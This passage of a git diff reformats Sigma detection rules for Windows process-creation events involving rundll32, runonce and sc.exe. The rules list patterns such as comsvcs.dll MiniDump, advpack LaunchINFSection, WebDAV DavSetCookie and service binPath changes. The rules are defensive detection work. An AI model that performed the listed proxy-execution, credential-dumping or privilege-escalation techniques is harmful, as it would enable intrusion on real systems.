:\RECYCLER\ - - :\SystemVolumeInformation\ - - NewProcessName|startswith: - - C:\Windows\Tasks\ - - C:\Windows\debug\ - - C:\Windows\fonts\ - - C:\Windows\help\ - - C:\Windows\drivers\ - - C:\Windows\addins\ - - C:\Windows\cursors\ - - C:\Windows\system32\tasks\ + - NewProcessName|contains: + - :\RECYCLER\ + - :\SystemVolumeInformation\ + - NewProcessName|startswith: + - C:\Windows\Tasks\ + - C:\Windows\debug\ + - C:\Windows\fonts\ + - C:\Windows\help\ + - C:\Windows\drivers\ + - C:\Windows\addins\ + - C:\Windows\cursors\ + - C:\Windows\system32\tasks\ condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml index 45db31d56..5d07a83d0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml @@ -19,18 +19,17 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: rundll32 + CommandLine|contains: rundll32 selection2: - CommandLine|contains: + CommandLine|contains: - mshtml,RunHTMLApplication - mshtml,#135 selection3: - CommandLine|contains: + CommandLine|contains: - 'javascript:' - 'vbscript:' condition: process_creation and (all of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml index 87dd4b2e7..c628c06aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shell32.dll - Control_RunDLL - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%LocalAppData%' - '%Temp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml index 2bf798a33..fe5310076 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml @@ -1,8 +1,7 @@ title: Potential ShellDispatch.DLL Functionality Abuse id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9 status: experimental -description: Detects potential "ShellDispatch.dll" functionality abuse to execute - arbitrary binaries via "ShellExecute" +description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" references: - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ author: X__Junior (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: RunDll_ShellExecuteW + CommandLine|contains: RunDll_ShellExecuteW condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml index 6aa773c15..556605d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml @@ -1,17 +1,15 @@ title: Potentially Suspicious Rundll32 Activity id: e593cf51-88db-4ee1-b920-37e89012a3c9 status: test -description: Detects suspicious execution of rundll32, with specific calls to some - DLLs with known LOLBIN functionalities +description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities references: - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ - https://twitter.com/Hexacorn/status/885258886428725250 - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52 - - https://twitter.com/nas_bench/status/1433344116071583746 - - https://twitter.com/eral4m/status/1479106975967240209 - - https://twitter.com/eral4m/status/1479080793003671557 -author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron - Systems) + - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut + - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib + - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen +author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/05/17 tags: @@ -25,91 +23,89 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - 'javascript:' - - .RegisterXLL - - CommandLine|contains|all: - - url.dll - - OpenURL - - CommandLine|contains|all: - - url.dll - - OpenURLA - - CommandLine|contains|all: - - url.dll - - FileProtocolHandler - - CommandLine|contains|all: - - zipfldr.dll - - RouteTheCall - - CommandLine|contains|all: - - shell32.dll - - Control_RunDLL - - CommandLine|contains|all: - - shell32.dll - - ShellExec_RunDLL - - CommandLine|contains|all: - - mshtml.dll - - PrintHTML - - CommandLine|contains|all: - - advpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - advpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieadvpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - ieadvpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieframe.dll - - OpenURL - - CommandLine|contains|all: - - shdocvw.dll - - OpenURL - - CommandLine|contains|all: - - syssetup.dll - - SetupInfObjectInstallAction - - CommandLine|contains|all: - - setupapi.dll - - InstallHinfSection - - CommandLine|contains|all: - - pcwutl.dll - - LaunchApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbShortcut - - CommandLine|contains|all: - - scrobj.dll - - GenerateTypeLib - - http - - CommandLine|contains|all: - - shimgvw.dll - - ImageView_Fullscreen - - http - - CommandLine|contains|all: - - comsvcs.dll - - MiniDump + - CommandLine|contains|all: + - 'javascript:' + - .RegisterXLL + - CommandLine|contains|all: + - url.dll + - OpenURL + - CommandLine|contains|all: + - url.dll + - OpenURLA + - CommandLine|contains|all: + - url.dll + - FileProtocolHandler + - CommandLine|contains|all: + - zipfldr.dll + - RouteTheCall + - CommandLine|contains|all: + - shell32.dll + - Control_RunDLL + - CommandLine|contains|all: + - shell32.dll + - ShellExec_RunDLL + - CommandLine|contains|all: + - mshtml.dll + - PrintHTML + - CommandLine|contains|all: + - advpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - advpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieadvpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - ieadvpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieframe.dll + - OpenURL + - CommandLine|contains|all: + - shdocvw.dll + - OpenURL + - CommandLine|contains|all: + - syssetup.dll + - SetupInfObjectInstallAction + - CommandLine|contains|all: + - setupapi.dll + - InstallHinfSection + - CommandLine|contains|all: + - pcwutl.dll + - LaunchApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbShortcut + - CommandLine|contains|all: + - scrobj.dll + - GenerateTypeLib + - http + - CommandLine|contains|all: + - shimgvw.dll + - ImageView_Fullscreen + - http + - CommandLine|contains|all: + - comsvcs.dll + - MiniDump filter_main_screensaver: - CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver - filter_main_parent_cpl: + CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver + filter_main_parent_cpl: # Settings ParentCommandLine|contains: .cpl - CommandLine|contains|all: + CommandLine|contains|all: - Shell32.dll - Control_RunDLL - .cpl ParentProcessName: C:\Windows\System32\control.exe filter_main_startmenu: - CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL - "C:\Windows\System32\' - CommandLine|endswith: .cpl", + CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\' + CommandLine|endswith: .cpl", ParentProcessName: C:\Windows\System32\control.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml index b1487a473..006b58aa3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml @@ -1,8 +1,7 @@ title: Suspicious Control Panel DLL Load id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 status: test -description: Detects suspicious Rundll32 execution from control.exe as used by Equation - Group and Exploit Kits +description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits references: - https://twitter.com/rikvduijn/status/853251879320662017 - https://twitter.com/felixw3000/status/853354851128025088 @@ -22,10 +21,10 @@ detection: selection_parent: ParentProcessName|endswith: \System32\control.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter: - CommandLine|contains: Shell32.dll + CommandLine|contains: Shell32.dll condition: process_creation and (all of selection_* and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml index a7f6be265..76463606f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml @@ -1,11 +1,10 @@ title: Suspicious Rundll32 Execution With Image Extension id: 4aa6040b-3f28-44e3-a769-9208e5feb5ec related: - - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e - type: similar + - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e + type: similar status: experimental -description: Detects the execution of Rundll32.exe with DLL files masquerading as - image files +description: Detects the execution of Rundll32.exe with DLL files masquerading as image files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.exe + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .bmp - .cr2 - .eps diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml index 9d3308cc4..36b100c46 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Usage Of ShellExec_RunDLL id: d87bd452-6da1-456e-8155-7dc988157b7d related: - - id: 36c5146c-d127-4f85-8e21-01bf62355d5a - type: obsoletes + - id: 36c5146c-d127-4f85-8e21-01bf62355d5a + type: obsoletes status: test -description: Detects suspicious usage of the ShellExec_RunDLL function to launch other - commands as seen in the the raspberry-robin attack +description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack references: - https://redcanary.com/blog/raspberry-robin/ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -23,9 +22,10 @@ detection: EventID: 4688 Channel: Security selection_openasrundll: - CommandLine|contains: ShellExec_RunDLL + CommandLine|contains: ShellExec_RunDLL selection_suspcli: - CommandLine|contains: + CommandLine|contains: + # Add more LOLBINs and Susp Paths - regsvr32 - msiexec - \Users\Public\ diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml index 3973f5859..9b8f8f3b4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml @@ -17,23 +17,22 @@ detection: EventID: 4688 Channel: Security selection1a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - apphelp.dll selection1b: - CommandLine|contains: + CommandLine|contains: - ShimFlushCache - '#250' selection2a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - kernel32.dll selection2b: - CommandLine|contains: + CommandLine|contains: - BaseFlushAppcompatCache - '#46' - condition: process_creation and (( selection1a and selection1b ) or ( selection2a - and selection2b )) + condition: process_creation and (( selection1a and selection1b ) or ( selection2a and selection2b )) fields: - NewProcessName - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml index f20cdea8f..242524efd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Activity Invoking Sys File id: 731231b9-0b5d-4219-94dd-abb6959aa7ea status: test -description: Detects suspicious process related to rundll32 based on command line - that includes a *.sys file as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe selection2: - CommandLine|contains: + CommandLine|contains: - .sys, - '.sys ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml index e6764ff3d..0666059eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml @@ -1,8 +1,7 @@ title: Rundll32 UNC Path Execution id: 5cdb711b-5740-4fb2-ba88-f7945027afac status: test -description: Detects rundll32 execution where the DLL is located on a remote location - (share) +description: Detects rundll32 execution where the DLL is located on a remote location (share) references: - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml index d642b6279..2f65ad951 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution With Uncommon DLL Extension id: c3a99af4-35a9-4668-879e-c09aeb4f2bdf status: experimental -description: Detects the execution of rundll32 with a command line that doesn't contain - a common extension +description: Detects the execution of rundll32 with a command line that doesn't contain a common extension references: - https://twitter.com/mrd0x/status/1481630810495139841?s=12 author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou @@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_known_extension: - CommandLine|contains: + CommandLine|contains: - .cpl - .dll - '.inf' filter_main_localserver: - CommandLine|contains: ' -localserver ' + CommandLine|contains: ' -localserver ' filter_main_zzzzInvokeManagedCustomActionOutOfProc: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Windows\Installer\MSI - .tmp - zzzzInvokeManagedCustomActionOutOfProc diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml index 2da23b225..38f2cc6a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml @@ -1,8 +1,7 @@ title: Suspicious Workstation Locking via Rundll32 id: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc status: test -description: Detects a suspicious call to the user32.dll function that locks the user - workstation +description: Detects a suspicious call to the user32.dll function that locks the user workstation references: - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ author: frack113 @@ -18,20 +17,19 @@ detection: EventID: 4688 Channel: Security selection_call_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_call_parent: ParentProcessName|endswith: \cmd.exe selection_call_cli: - CommandLine|contains: user32.dll, + CommandLine|contains: user32.dll, selection_function: - CommandLine|contains: LockWorkStation + CommandLine|contains: LockWorkStation condition: process_creation and (all of selection_*) fields: - NewProcessName - ParentProcessName falsepositives: - - Scripts or links on the user desktop used to lock the workstation instead of - Windows+L or the menu option + - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml index fb8096b7c..3106727b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml @@ -1,13 +1,9 @@ title: WebDav Client Execution Via Rundll32.EXE id: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 status: test -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like "C:\windows\system32\davclnt.dll,DavSetCookie". - - This could be an indicator of exfiltration or use of WebDav to launch code (hosted - on a WebDav server). - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". + This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). references: - https://github.com/OTRF/detection-hackathon-apt29/issues/17 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md @@ -27,10 +23,10 @@ detection: selection_parent: ParentProcessName|endswith: \svchost.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml index d856c83f4..b1e9ae0be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml @@ -1,12 +1,8 @@ title: Suspicious WebDav Client Execution Via Rundll32.EXE id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 status: experimental -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator - of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially - a sign of exploitation of CVE-2023-23397 - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 references: - https://twitter.com/aceresponder/status/1636116096506818562 - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ @@ -29,15 +25,15 @@ detection: Channel: Security selection: ParentCommandLine|contains: -s WebClient - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_local_ips: - CommandLine|contains: - - ://10. - - ://192.168. - - ://172.16. + CommandLine|contains: + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -53,8 +49,8 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml index 91c39cbc0..2e913c913 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without Parameters id: 5bb68627-3198-40ca-b458-49f973db8752 status: test -description: Detects rundll32 execution without parameters as observed when running - Metasploit windows/smb/psexec exploit module +description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - rundll32.exe - rundll32 condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml b/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml index 25f7e47db..0215e54fa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml @@ -1,8 +1,7 @@ title: Run Once Task Execution as Configured in Registry id: 198effb6-6c98-4d0c-9ea3-451fa143c45c status: test -description: This rule detects the execution of Run Once task as configured in the - registry +description: This rule detects the execution of Run Once task as configured in the registry references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \runonce.exe - - Description: Run Once Wrapper + - NewProcessName|endswith: \runonce.exe + - Description: Run Once Wrapper selection_cli: - - CommandLine|contains: /AlternateShellStartup - - CommandLine|endswith: /r + - CommandLine|contains: /AlternateShellStartup + - CommandLine|endswith: /r condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml b/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml index 27dbb9d57..3934d2817 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml @@ -1,8 +1,7 @@ title: Possible Privilege Escalation via Weak Service Permissions id: d937b75f-a665-4480-88a5-2f20e9f9b22a status: test -description: Detection of sc.exe utility spawning by user with Medium integrity level - to change service ImagePath or FailureCommand +description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/30/weak-service-permissions/ @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security scbynonadmin: - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe MandatoryLabel: S-1-16-8192 selection_binpath: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath selection_failure: - CommandLine|contains|all: + CommandLine|contains|all: - failure - command condition: process_creation and (scbynonadmin and 1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml index 25f249e8e..a77c5cf14 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using Sc.EXE id: 85ff530b-261d-48c6-a441-facaa2e81e48 related: - - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 - type: similar + - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell + type: similar status: test description: Detects the creation of a new service using the "sc.exe" utility. references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection falsepositives: - Legitimate administrator or user creates a service for legitimate reasons. diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml index 75ae474bb..4abd8dda9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via Sc.EXE id: 85c312b7-f44d-4a51-a024-d671c40b49fc status: test -description: Detect the use of "sc.exe" to change the startup type of a service to - "disabled" or "demand" +description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' config ' - start - CommandLine|contains: + CommandLine|contains: - disabled - demand condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml b/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml index 17dc6ac88..2b85ef033 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_new_kernel_driver.yml @@ -19,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - create - config - CommandLine|contains|all: + CommandLine|contains|all: - binPath - type - kernel - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection falsepositives: - Rare legitimate installation of kernel drivers via sc.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_query.yml b/sigma/builtin/process_creation/proc_creation_win_sc_query.yml index bf2ec24b9..307259663 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_query.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_query.yml @@ -1,8 +1,7 @@ title: SC.EXE Query Execution id: 57712d7a-679c-4a41-a913-87e7175ae429 status: test -description: Detects execution of "sc.exe" to query information about registered services - on the system +description: Detects execution of "sc.exe" to query information about registered services on the system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery author: frack113 @@ -20,14 +19,12 @@ detection: Channel: Security selection_img: OriginalFileName|endswith: sc.exe - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_cli: - CommandLine|contains: ' query' + CommandLine|contains: ' query' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate query of a service by an administrator to get more information such - as the state or PID - - Keybase process "kbfsdokan.exe" query the dokan1 service with the following - commandline "sc query dokan1" + - Legitimate query of a service by an administrator to get more information such as the state or PID + - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query 